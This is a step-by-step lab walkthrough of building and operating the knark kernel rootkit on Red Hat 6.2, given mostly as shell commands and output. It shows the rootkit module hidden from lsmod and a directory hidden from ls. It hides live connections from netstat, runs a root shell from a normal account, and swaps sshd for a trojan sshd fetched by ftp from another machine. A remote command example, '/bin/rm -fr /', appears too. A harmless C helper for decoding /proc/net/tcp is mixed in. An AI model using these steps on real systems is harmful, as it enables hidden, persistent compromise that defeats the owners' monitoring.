Because of the version issue I could only test knark-0.59.tar.gz on Red Hat 6.2:

Red Hat Linux release 6.2 (Zoot)
Kernel 2.2.14-5.0 on an i686
login: chi
Password:
Last login: Sat May 3 23:03:22 from 192.168.25.1
[chi@chi chi]$ su root
Password:
[root@chi chi]# ls
knark-0.59.tar.gz
[root@chi chi]# tar -xzvf knark*
knark-0.59/
knark-0.59/README
knark-0.59/Makefile
knark-0.59/src/
knark-0.59/src/ered.c
knark-0.59/src/hidef.c
knark-0.59/src/knark.c
knark-0.59/src/modhide.c
knark-0.59/src/rootme.c
knark-0.59/src/taskhack.c
knark-0.59/src/knark.h
knark-0.59/src/rexec.c
knark-0.59/src/nethide.c
knark-0.59/src/author_banner.c
[root@chi chi]# ls
knark-0.59 knark-0.59.tar.gz
[root@chi chi]# cd knark*
[root@chi knark-0.59]# ls
Makefile README src
[root@chi knark-0.59]# make all
cc -Wall -O2 -Wstrict-prototypes -fomit-frame-pointer -pipe -fno-strength-reduce -malign-loops=2 -malign-jumps=2 -malign-functions=2 -include /usr/src/linux/include/linux/modversions.h -I/usr/src/linux/include -c src/knark.c -o knark.o -D__KERNEL__ -DMODULE -DMODVERSIONS
cc -Wall -O2 -Wstrict-prototypes -fomit-frame-pointer -pipe -fno-strength-reduce -malign-loops=2 -malign-jumps=2 -malign-functions=2 -include /usr/src/linux/include/linux/modversions.h -I/usr/src/linux/include -Wno-uninitialized -c src/modhide.c
cc -Wall -O2 -c -o src/author_banner.o src/author_banner.c
cc -Wall -O2 -c -o src/rootme.o src/rootme.c
src/rootme.c: In function `main':
src/rootme.c:38: warning: implicit declaration of function `settimeofday'
cc -Wall -O2 -o rootme src/author_banner.o src/rootme.o
cc -Wall -O2 -c -o src/hidef.o src/hidef.c
cc -Wall -O2 -o hidef src/author_banner.o src/hidef.o
strip hidef
cc -Wall -O2 -c -o src/ered.o src/ered.c
cc -Wall -O2 -o ered src/author_banner.o src/ered.o
cc -Wall -O2 -c -o src/nethide.o src/nethide.c
cc -Wall -O2 -o nethide src/author_banner.o src/nethide.o
cc -Wall -O2 -c -o src/rexec.o src/rexec.c
cc -Wall -O2 -o rexec src/author_banner.o src/rexec.o
cc -Wall -O2 -c -o src/taskhack.o src/taskhack.c
In file included from /usr/include/sys/types.h:30, <----- taskhack fails to compile (see the error below)
from src/taskhack.c:14:
/usr/include/bits/types.h:95: warning: `__NFDBITS' redefined
/usr/include/linux/posix_types.h:22: warning: this is the location of the previous definition
/usr/include/bits/types.h:97: warning: `__FDMASK' redefined
/usr/include/linux/posix_types.h:34: warning: this is the location of the previous definition

....... (omitted)
In file included from /usr/include/fcntl.h:33,
from src/taskhack.c:16:
/usr/include/bits/fcntl.h:109: redefinition of `struct flock'
make: *** [src/taskhack.o] Error 1
[root@chi knark-0.59]# ls
Makefile README ered hidef knark.o modhide.o nethide rexec rootme src
[root@chi knark-0.59]#

After building, insert knark.o into the kernel first. Watch:

[root@chi knark-0.59]# insmod knark.o
bash: insmod: command not found
[root@chi knark-0.59]# /sbin/insmod knark.o
[root@chi knark-0.59]# /sbin/lsmod
Module Size Used by
knark 6936 0 (unused) <--------- you can see knark was inserted
lockd 30344 1 (autoclean)
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6
[root@chi knark-0.59]# /sbin/insmod modhide.o <---- insert the module-hiding module (the "busy" error is expected: modhide unlinks knark from the module list and then refuses to stay loaded itself)
modhide.o: init_module: Device or resource busy
[root@chi knark-0.59]# /sbin/lsmod
Module Size Used by
lockd 30344 1 (autoclean) <----- knark is gone!
sunrpc 52132 1 (autoclean) [lockd]
pcnet32 10308 1 (autoclean)
BusLogic 86060 6
[root@chi knark-0.59]#

Next I test each executable. First hidef and unhidef:

[root@chi knark-0.59]# ./hidef

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./hidef /usr/lib/.hax0r
[root@chi knark-0.59]# mkdir /tmp/rootkit <---- create a rootkit directory under /tmp
[root@chi knark-0.59]# ls /tmp
install.log rootkit
[root@chi knark-0.59]# ./hidef /tmp/rootkit <---- hide the rootkit directory

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>

[root@chi knark-0.59]# ls /tmp
install.log <---- see, ls no longer shows it.

[root@chi knark-0.59]# cd /proc/knark
[root@chi knark]# ls
author files nethides pids redirects
[root@chi knark]# cat files
HIDDEN FILES
/tmp/rootkit <---- the files to hide are recorded in /proc/knark/files
[root@chi knark]# cd /home/chi/knark-0.59
[root@chi knark-0.59]# ./unhidef /tmp/rootkit <---- unhide the rootkit directory

hidef.c by Creed @ #hack.se 1999 <creed@sekure.net>
Port to 2.4 by Cyberwinds #Irc.openprojects.net 2001
[root@chi knark-0.59]# ls /tmp
install.log rootkit <---- visible again
[root@chi knark-0.59]#

Now let's look at nethide:

[root@chi knark-0.59]# ./nethide

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./nethide <string>
./nethide -c (clear nethide-list)
ex: ./nethide ":ABCD" (will hide connections to/from port 0xABCD)
 
Usage:
./nethide <string>: string is the text to filter; once it is hidden, even root will not see the connection in netstat!

Connections are recorded in /proc/net/tcp and /proc/net/udp; to hide a connection, look at those files first. Note that they are in hexadecimal.

./nethide -c clears the nethide list.
./nethide ":ABCD" hides connections involving port 0xABCD; again, the port is hexadecimal.
Let's try it!
[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:1024 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:ntalk *:*
udp 0 0 *:talk *:*

........ more below, not shown.

Now we want to hide:

tcp 0 138 192.168.25.5:telnet 192.168.25.1:3432 ESTABLISHED

udp 0 0 *:ntalk *:*

First look at /proc/net/tcp and /proc/net/udp to get the hex representation of these two connections.

[root@chi knark-0.59]# cat /proc/net/tcp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 0519A8C0:0017 0119A8C0:11D2 01 00000002:00000000 01:00000019 00000000 0 0 857
1: 00000000:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 574
2: 00000000:0203 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 530
3: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 509
4: 00000000:0062 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 505
5: 00000000:004F 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 504
........more

[root@chi knark-0.59]# cat /proc/net/udp
sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode
0: 00000000:0206 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 503
1: 00000000:0205 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 502
2: 00000000:03A9 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 360
3: 00000000:0400 00000000:0000 07 00000000:00000000 00:FFFFFFFF 00000000 0 0 336
4: 00000000:006F 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 319

.......more

Find the matching hex entries. Hex is hard to read, so let's write a small program to convert:

[root@chi chi]# cat >to16.c
#include <stdio.h>

/* Convert between decimal and the hex used in /proc/net/tcp and /proc/net/udp. */
int main(void)
{
    unsigned int i;

    printf("please make your choice\n");
    printf("from Decimal to Hex, enter d\n");
    printf("from Hex to Decimal, enter h\n");

    if (getchar() == 'd')        /* character constant, not a variable named d */
    {
        printf("please enter a decimal :");
        scanf("%u", &i);
        printf("print it out in Hex :");
        printf("0x%.4x\n", i);
    }
    else
    {
        printf("please enter a Hex :");
        scanf("%x", &i);         /* %x needs an unsigned int, not a char */
        printf("print it out in Decimal :");
        printf("%u\n", i);
    }
    return 0;
}

[root@chi chi]# gcc -o to16 to16.c
[root@chi chi]# ./to16
please make your choice
from Decimal to Hex, enter d
from Hex to Decimal, enter h
h
please enter a Hex :0017 <------- hexadecimal
print it out in Decimal :23 <------- 23 is the telnet port

[root@chi chi]#

 

Telnet's port is found; ntalk's port is 518 (0x0206). Converting those, you find these two entries:

0: 0519A8C0:0017 0119A8C0:11D2 01 00000002:00000000 01:00000019 00000000 0 0 857

0: 00000000:0206 00000000:0000 07 00000000:00000000 00:00000000 00000000 0 0 503
 
Then use nethide:

[root@chi knark-0.59]# ./nethide ":0017"

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: ":0017" is now removed

[root@chi knark-0.59]# ./nethide ":0206"

nethide.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: ":0206" is now removed
[root@chi chi]# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:smtp *:* LISTEN <--------- the telnet connection is gone!
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:linuxconf *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:login *:* LISTEN
tcp 0 0 *:shell *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:939 *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
udp 0 0 *:talk *:* <--------- ntalk is gone!
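
The hex lookup above can be done on whole lines instead of one number at a time. The following is an added example (my code, not knark's and not part of the article) that decodes the local and remote address fields of /proc/net/tcp and /proc/net/udp into dotted-decimal form and produces the ":XXXX" string nethide expects. The sample dump is constructed from the lines shown above, and the byte order assumed is that of the x86 box on this page.

```c
/*
 * Added example; not part of the article and not knark's code.
 * Decodes the hex fields of /proc/net/tcp and /proc/net/udp that nethide
 * matches against, and builds the ":XXXX" argument nethide expects.
 *
 * Layout of a data line (see the dumps above):
 *   <sl>: <local_ip>:<local_port> <remote_ip>:<remote_port> <st> ...
 * The IPv4 address is eight hex digits of the 32-bit value as stored,
 * which on little-endian x86 prints the bytes reversed (0519A8C0 is
 * 192.168.25.5); the port is four hex digits that read naturally.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct sock_entry {
    char local_ip[16];
    int  local_port;
    char remote_ip[16];
    int  remote_port;
    int  state;        /* 01 ESTABLISHED, 0A LISTEN, 07 CLOSE (the udp value) */
};

/* "0519A8C0" -> "192.168.25.5": low byte first, as on x86. */
void hex_ipv4(const char *hex8, char out[16])
{
    unsigned long v = strtoul(hex8, NULL, 16);
    snprintf(out, 16, "%lu.%lu.%lu.%lu",
             v & 0xff, (v >> 8) & 0xff, (v >> 16) & 0xff, (v >> 24) & 0xff);
}

/* Parse one data line of /proc/net/{tcp,udp}; 1 on success, 0 for the header or junk. */
int parse_sock_line(const char *line, struct sock_entry *e)
{
    int sl;
    unsigned lport, rport, st;
    char lip[9], rip[9];
    if (sscanf(line, " %d: %8[0-9A-Fa-f]:%x %8[0-9A-Fa-f]:%x %x",
               &sl, lip, &lport, rip, &rport, &st) != 6)
        return 0;
    hex_ipv4(lip, e->local_ip);
    hex_ipv4(rip, e->remote_ip);
    e->local_port  = (int)lport;
    e->remote_port = (int)rport;
    e->state       = (int)st;
    return 1;
}

/* Port number -> the string nethide wants, e.g. 518 -> ":0206". */
void nethide_arg(int port, char out[6])
{
    snprintf(out, 6, ":%04X", port & 0xffff);
}

/*
 * Walk a whole dump and count entries whose local port equals `port`,
 * copying the first match to *first.  These are the lines a rule such as
 * ":0017" makes disappear on the local side (nethide is a plain substring
 * match on the text, so ":0017" in the remote column vanishes as well).
 */
int find_by_local_port(const char *dump, int port, struct sock_entry *first)
{
    int hits = 0;
    for (const char *p = dump; *p; ) {
        struct sock_entry e;
        if (parse_sock_line(p, &e) && e.local_port == port) {
            if (hits == 0 && first != NULL)
                *first = e;
            hits++;
        }
        const char *nl = strchr(p, '\n');
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return hits;
}

/* Constructed sample dump: the header plus three lines copied from the dumps above. */
static const char sample_dump[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 0519A8C0:0017 0119A8C0:11D2 01 00000002:00000000 01:00000019 00000000     0        0 857\n"
    "   1: 00000000:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 574\n"
    "   0: 00000000:0206 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 503\n";

int main(void)
{
    char arg[6];
    for (const char *p = sample_dump; *p; ) {
        struct sock_entry e;
        if (parse_sock_line(p, &e)) {
            nethide_arg(e.local_port, arg);
            printf("%s:%d -> %s:%d state %02X   nethide %s\n",
                   e.local_ip, e.local_port, e.remote_ip, e.remote_port, e.state, arg);
        }
        const char *nl = strchr(p, '\n');
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return 0;
}
```

Feed it `cat /proc/net/tcp` instead of the sample to list every socket the way netstat would, then compare with what a possibly trojaned netstat prints. Note that the remote port in the /proc line (0x11D2, 4562) differs from the 3432 in the earlier netstat output on this page; the two captures are from different telnet sessions.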

 

Which program is next? rootme. This one is easy to understand: it runs a program with root privileges.

[chi@chi chi]$ cd knark*
[chi@chi knark-0.59]$ ls <-------- the $ shows you are not root yet

Makefile ered knark.o nethide rootme taskhack
README hidef modhide.o rexec src unhidef
[chi@chi knark-0.59]$ ./rootme /bin/sh

rootme.c by Creed @ #hack.se 1999 <creed@sekure.net>

Do you feel lucky today, hax0r?
bash# id <-------- #, and look at the id: root!
uid=0(root) gid=0(root) groups=500(chi)
bash#

Since taskhack did not compile, I did not test it. Next, the redirection program ered:

[root@chi knark-0.59]# mkdir /dev/ptyxx
[root@chi knark-0.59]# cd /dev/ptyxx
[root@chi ptyxx]# ftp 192.168.25.1 <-------- ftp to another machine to download an sshd binary
Connected to 192.168.25.1.
220 chi-1 Microsoft FTP Service (Version 5.0).
Name (192.168.25.1:chi): chi
331 Password required for chi.
Password:
230 User chi logged in.
Remote system type is Windows_NT.
ftp> ls <-------- this package is actually the ark rootkit!
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-00 11:52AM 18052 ark
12-08-00 11:48AM 33 compile
12-08-00 11:48AM 117311 du
12-08-00 11:48AM 22459 killall
12-08-00 11:48AM 27896 login-normal
12-08-00 11:48AM 43336 login-shadow
12-08-00 11:48AM 184023 ls
12-08-00 11:48AM 258612 netstat
12-08-00 11:48AM 47388 ps
12-08-00 11:48AM 24147 pstree
12-08-00 11:48AM 1923 README
12-08-00 11:48AM 655916 sshd
12-08-00 11:48AM 28696 syslogd
12-08-00 11:48AM 68692 top
12-08-00 11:52AM 138 VERSION
226 Transfer complete.
ftp> get sshd <--- download sshd
local: sshd remote: sshd
200 PORT command successful.
150 Opening ASCII mode data connection for sshd(655916 bytes).
WARNING! 952 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
655916 bytes received in 0.72 secs (8.9e+02 Kbytes/sec)
ftp> by
221
[root@chi ptyxx]#

Now use ered to redirect the file. (The transfer above ran in ASCII mode and ftp warned about bare linefeeds; a binary fetched that way can be corrupted, so `binary` should be typed at the ftp prompt first.)

[root@chi ptyxx]# ls
sshd
[root@chi ptyxx]# chmod 777 sshd
[root@chi ptyxx]# cd /home/chi/knark*
[root@chi knark-0.59]# ./ered

ered.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./ered <from> <to>
./ered -c (clear redirect-list)
ex: ./ered /usr/local/sbin/sshd /usr/lib/.hax0r/sshd_trojan
[root@chi knark-0.59]# ./ered /usr/sbin/sshd /dev/ptyxx/sshd

ered.c by Creed @ #hack.se 1999 <creed@sekure.net>

Done: /usr/sbin/sshd -> /dev/ptyxx/sshd
[root@chi knark-0.59]#

Now if anyone runs /usr/sbin/sshd, what actually executes is our /dev/ptyxx/sshd.

There is also rexec, which I don't find very useful: it sends spoofed UDP packets to make a remote system running knark execute the command you want:

[root@chi knark-0.59]# ./rexec

rexec.c by Creed @ #hack.se 1999 <creed@sekure.net>

Usage:
./rexec <src_addr> <dst_addr> <command> [args ...]
ex: ./rexec www.microsoft.com 192.168.1.77 /bin/rm -fr /

............

That concludes the knark section.


 